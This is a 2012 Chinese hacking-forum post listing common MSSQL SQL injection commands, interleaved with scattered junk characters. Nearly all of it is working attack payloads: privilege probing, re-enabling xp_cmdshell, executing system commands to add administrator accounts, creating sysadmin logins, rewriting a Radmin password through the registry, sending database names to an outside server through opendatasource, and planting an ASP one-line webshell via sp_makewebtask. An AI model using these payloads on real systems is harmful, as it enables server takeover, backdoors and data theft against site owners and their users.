找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2149|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
//看看是什么权限的
: p" E5 q$ X+ i" O" |and 1=(Select IS_MEMBER('db_owner'))/ b# p* t( K4 V  v
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--1 _% {" Z" ?8 J
7 u. d1 E: D: E" c8 d
//检测是否有读取某数据库的权限. V" i2 Q# U, X' V* D
and 1= (Select HAS_DBACCESS('master'))' w' U& \0 ~' S0 O
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
) R8 e2 o# g7 J& t
6 r; l% e. s+ O+ T0 G6 ^
& i) D, d! u$ e数字类型
; \  c2 s' L8 \and char(124)%2Buser%2Bchar(124)=0
  z$ e# {5 t. f* l0 B$ a8 B+ v7 D1 |2 z  T9 I4 Q2 k9 K+ W/ z5 H
字符类型8 y9 b3 ?4 T. N! H4 M  z4 L0 Q' b
' and char(124)%2Buser%2Bchar(124)=0 and ''='$ I+ D; c* }3 Y& E' T
. r1 [/ l0 u- t! T* {
搜索类型
, S4 P# R# R3 ^' F. X0 k' and char(124)%2Buser%2Bchar(124)=0 and '%'='- R, U$ U  r8 {, t

1 _. k; V5 g! R. L& C! t/ T; |爆用户名' p; k6 q5 ^+ s/ d, e1 f; L
and user>0
4 C9 T, ]. W0 M' and user>0 and ''='; ]& S% ~" a3 {! }6 a" b# {' s/ i' }

) E# C! ?) g  ?) X检测是否为SA权限
1 M/ D- ^$ \3 {8 R7 c9 Tand 1=(select IS_SRVROLEMEMBER('sysadmin'));--/ W0 @. g) [/ i! ^
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --# `& E" h( K2 C

( v. y8 L1 a9 Y* c检测是不是MSSQL数据库
9 V3 \# m0 z1 X1 t* Hand exists (select * from sysobjects);--' U7 ~' V1 N" d: K
& S4 x$ h' [# @: t$ c) U
检测是否支持多行
! K7 Y6 X  I0 f$ O/ v! A$ d;declare @d int;--1 q2 n; A9 S/ s( M! u+ s& G2 T
2 J5 ~# j" p: M+ U. V( W0 L5 c& R0 T
恢复 xp_cmdshell
8 P  I9 Q8 p( S9 f;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--  y( E( d8 W: O& n" `2 w
6 S6 l8 F3 b- T+ j' G
. h4 h% X7 [2 L$ O
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')! a! N$ p& ]* C0 y7 A" R# d3 V

% K% ~  z$ L* x& c: f& g% c//-----------------------+ {  |$ E  H1 P7 W9 G
//       执行命令3 G5 ]! T5 t7 p, p+ c
//-----------------------9 O: \# S) s2 C* x
首先开启沙盘模式:4 e0 q. l3 `1 Q+ T
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; Y" \& R2 P$ C/ o) o
* k8 \. A2 H, H3 S  {8 j
然后利用jet.oledb执行系统命令$ [( l! \7 [; p9 B+ O
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
6 Y+ D' b! n, I+ g. |4 K: x1 ]2 H4 h
执行命令+ Z  x+ r! c6 k" n6 X
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--  s% `* f, z; T; B

. V/ L# G2 k! r$ y! w, [! xEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'2 O% Y  v# L; `/ m

; `# x: i; E8 y& x) [判断xp_cmdshell扩展存储过程是否存在:
: o& [6 V5 t2 ~4 t4 Nhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
" u7 u# B7 @$ a, W; m- M, q2 @! i" f1 N$ L/ m. `1 \  e  Y7 h
写注册表
0 z% t% Y! p4 k2 t5 kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
6 T6 L; f' N3 x3 Q. Y9 c: c6 m: F
REG_SZ5 B* P9 s1 F; A+ H4 p, a( v
" W, |4 J8 Q- T6 j' i9 J. I. u
读注册表
6 ]% |$ V* z9 O# S  Xexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit') U$ t) u. G' U) k+ q# h1 L

& a- Y# o+ S+ t. H( l6 Y读取目录内容& L4 G1 J0 |# L6 i5 ~# y9 Z3 o5 P2 \
exec master..xp_dirtree 'c:\winnt\system32\',1,1
4 }/ n' R* ~6 z- N* Q' V& x& q/ ]3 ^( \$ [3 A" M2 [
, W: A2 O4 L- t' V( Q9 L
数据库备份
; e* ^, ^% M; r- m" Gbackup database pubs to disk = 'c:\123.bak'
  t' P7 ^8 d) b: c# V7 `9 t, E& Y/ E5 n; d2 F& j4 A9 V) S
//爆出长度
5 ~5 _, k$ h7 Q9 FAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--# C, X& j8 {) b7 ^) ?' [! A9 [0 |
/ v2 z5 H$ H9 p7 q0 D
2 N2 z7 |" N! u# Q

* L" N/ ?7 Z; }# P更改sa口令方法:用sql综合利用工具连接后,执行命令:
2 o5 F1 L/ i& Y; j) gexec sp_password NULL,'新密码','sa'
1 @) g( c1 r& X/ i& E3 X  e7 _+ d+ e0 o; q4 t7 w  F: c6 H4 Q
添加和删除一个SA权限的用户test:
$ l: f' J) k3 E8 P3 L2 P: [! dexec master.dbo.sp_addlogin test,9530772
  f- j' f$ _8 eexec master.dbo.sp_addsrvrolemember test,sysadmin
4 b9 O% T3 ?: [8 T" m  y$ r# Q
; G( E$ ]0 p) e  O. A4 |删除扩展存储过过程xp_cmdshell的语句:2 T: u. s* E! C
exec sp_dropextendedproc 'xp_cmdshell'
, U" K6 O' n5 t, e6 h& x$ ^$ W9 q9 E( |0 k2 L, t( g
添加扩展存储过过程- w  {) d+ {! M. o1 X" U* P
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'% N7 _7 Z8 y6 r6 a0 c, g2 N, m
GRANT exec On xp_proxiedadata TO public
6 s0 G* h$ ^& F/ d& m7 M* t
9 \" L$ z6 l9 B9 @3 b' K; `$ h$ Y# q* ^# |6 K% V& ^2 b+ c0 @
停掉或激活某个服务。# F- e3 e) n/ o  f
- z  |2 q# |, z  s2 E+ }' A4 V- N3 p
exec master..xp_servicecontrol 'stop','schedule'6 |, j( x5 I# N1 X1 g
exec master..xp_servicecontrol 'start','schedule'
% s/ x! ~/ z4 n. W9 i
) a/ p) N1 L2 C6 I2 }& w: G2 mdbo.xp_subdirs: Z" G! l5 Q6 Y
4 E7 `! N+ u* n, b
只列某个目录下的子目录。
3 T6 ]4 [9 p+ wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
( ~0 ]% g# E2 X- E( g0 Z3 b
; z( y& i6 \9 Sdbo.xp_makecab
2 q7 L  L3 ], S& ]/ m
! @' A7 {3 ?9 P" R8 Q9 Y/ Y  b将目标多个档案压缩到某个目标档案之内。
* S+ q6 w1 f& C. v+ L; Z所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。( S0 ?, H0 G9 o2 h$ x' P# O

8 A5 d2 @1 k: Y2 Kdbo.xp_makecab* p8 h2 _* H8 D4 ?* }
'c:\test.cab','mszip',1,( O  v8 m  y$ f" }
'C:\Inetpub\wwwroot\SQLInject\login.asp',# a1 ]4 d2 R# {! B
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'" j  n) A' ?5 D* G( a+ K9 d
4 x2 E. J5 k& k$ W8 U' _
xp_terminate_process
1 |# |) h+ T- z: b" j
. B7 w' r5 f8 f% A& I( c停掉某个执行中的程序,但赋予的参数是 Process ID。& |3 {' A& B$ a; w6 J' @4 K
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
/ @2 y8 D  F, D4 Q/ m% A+ b5 d9 r) w3 z& X5 `" N6 Y
xp_terminate_process 2484
3 v  q2 d6 G4 c- a0 h# j
  @2 {( u" o; M1 i6 s5 s! K( kxp_unpackcab
, _2 b! [  V* Z4 ~9 M3 L8 w, [
' S; |' @: P2 A/ U" p解开压缩档。
( b' J. E8 m% |( ^; G3 N
4 D8 J" g9 w1 a! a+ txp_unpackcab 'c:\test.cab','c:\temp',1% S6 B- O* v  I( g  A& _  ^0 R
8 s1 d8 M. l$ s, [  W' G  k

/ Q, ?0 C0 Y" N7 h7 {/ ]某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234# \) h' Y9 c& H! _& J

! o) P1 s: C* Xcreate database lcx;
6 {, u+ Y( f9 j1 A- n0 gCreate TABLE ku(name nvarchar(256) null);
  u8 q% p: E% ]! W1 p) BCreate TABLE biao(id int NULL,name nvarchar(256) null);
  ^" ^% {$ a" f: e7 N! T& O! B1 R0 h0 u1 B" Q" B
//得到数据库名
( d" \4 ^5 D. w7 [+ minsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases4 U/ o! k. C  P4 X' d
% s9 N6 Y3 w% h+ A& Y6 T

8 J, m9 ^9 c4 m//在Master中创建表,看看权限怎样
( X' {. y  x6 `7 Y& aCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
9 ^3 a7 J- _: p+ V3 i+ j+ Q4 K  j5 l# U, x' n& w0 `! D
用 sp_makewebtask直接在web目录里写入一句话马:
) G) M( a7 {, t4 F0 `http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
# v1 x4 c6 R4 ]1 p3 z- t% x  j* D$ b  B% ~! r  g/ Y
//更新表内容& P$ f" ~: i$ [# X3 F; T
Update films SET kind = 'Dramatic' Where id = 123$ q0 t6 B4 W- q& n% O8 s) ^
$ `% ]& W( S, j( b
//删除内容- F# C" F; P, o2 ~6 E; c7 o' F9 x
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表